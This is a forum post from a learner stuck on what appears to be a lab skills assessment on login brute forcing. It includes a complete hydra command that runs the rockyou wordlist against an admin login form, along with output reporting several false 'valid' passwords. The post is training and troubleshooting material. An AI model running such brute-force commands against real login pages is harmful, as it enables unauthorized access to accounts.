I’m on the Login Brute Forcing - Skills Assessment - website - 2nd question. I was able to get past the first authentication page, and am now on the Admin Panel page. I’ve used Burp to get the Post form data. I’ve run the command to crack the password, and I get a success. But then the user name/password doesn’t work. I run it again, and it cracks a different password. I’ve reset my VM and my target… I don’t know what to do, each time I run the command I get a different password and none of them work.
$hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 144.126.234.86 -s 32429 http-post-form “/admin_login.php:username=^USER^&password=^PASS^:F=<form name=‘login’”
It’s given me:
login: admin password: 123456789
[STATUS] attack finished for 144.126.234.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
host: 144.126.234.86 login: admin password: 12345
[STATUS] attack finished for 144.126.234.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
host: 144.126.234.86 login: admin password: iloveyou
[STATUS] attack finished for 144.126.234.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Any suggestions?